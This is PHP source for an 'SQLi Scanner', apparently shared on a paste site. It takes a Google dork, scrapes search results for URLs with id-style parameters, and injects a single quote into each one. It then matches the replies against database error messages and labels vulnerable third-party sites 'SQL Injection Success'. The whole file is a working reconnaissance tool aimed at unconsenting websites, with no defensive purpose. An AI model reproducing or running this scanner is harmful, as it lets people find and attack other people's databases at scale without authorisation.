<html><head><title>SQLi Scanner by r3m1ck</title><style>body{backgroun

1. <html>
2. <head>
3. <title>SQLi Scanner by r3m1ck</title>
4. <style>
5. body{
6. background: black;
7. color: red;
8. font-family: monospace;
9. font-size: 12px;
10. }
11.  
12. input{
13. background: black;
14. border: 1px solid red;
15. color: red;
16. }
17.  
18. h2{
19. color: red;
20. }
21.  
22. a{ color: #5A5A5A; text-decoration: none; }
23. a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }
24. a:hover{ color: #00FF00; text-decoration: line-through; }
25. .effectok:hover { text-decoration: underline; }
26. .effectfalse:hover { text-decoration: line-through; }
27.  
28. </style>
29.  
30. </head>
31. <body>
32.  
33. <?php
34. echo "<h2>SQLi Scanner By r3m1ck ~ Indonesian Coder</h2>";
35. echo "<form action='' method='post'>";
36. echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
37. echo "<input type='submit' value=' Start '>";
38. echo "<hr><br />";
39.  
40. if($_POST['dork']) {
41.  
42. @set_time_limit(0);
43. @error_reporting(0);
44. @ignore_user_abort(true);
45. ini_set('memory_limit', '128M');
46.  
47. $google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";
48.  
49. $i = 0;
50. $a = 0;
51. $b = 0;
52.  
53. while($b <= 900) {
54. $a = 0;
55. flush(); ob_flush();
56. echo "Pages: [ $b ]<br />";
57. echo "Dork: [ <b>".$_POST['dork']."</b> ]<br />";
58. echo "Scanning Google<br />";
59. flush(); ob_flush();
60.  
61. if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
62. echo "Bisey bulunamad&#305;<br />";
63. flush(); ob_flush();
64. break;
65. }
66.  
67. preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
68. echo "Loadiing…<br />";
69. flush(); ob_flush();
70. while(1) {
71.  
72. if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
73. echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='green'>SQL Injection Success !</font><br />";
74. } else {
75. echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Not access ! </font><br />";
76. flush(); ob_flush();
77. }
78. if($a > count($sites[2])-2) {
79. echo "Bitti<br />";
80. break;
81. }
82. $a = $a+1;
83. }
84. $b = $b+100;
85. }
86. }
87.  
88. function Connect_Host($url) {
89. $ch = curl_init();
90. curl_setopt($ch, CURLOPT_FOLLOW, 0);
91. curl_setopt($ch, CURLOPT_HEADER, 1);
92. curl_setopt($ch, CURLOPT_URL, $url);
93. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
94. curl_setopt($ch, CURLOPT_TIMEOUT, 30);
95. $data = curl_exec($ch);
96. if($data) {
97. return $data;
98. } else {
99. return 0;
100. }
101. }
102.  
103. function Clean($text) {
104. return htmlspecialchars($text, ENT_QUOTES);
105. }
106.  
107. ?>
108.  
109. </body>
110. </html>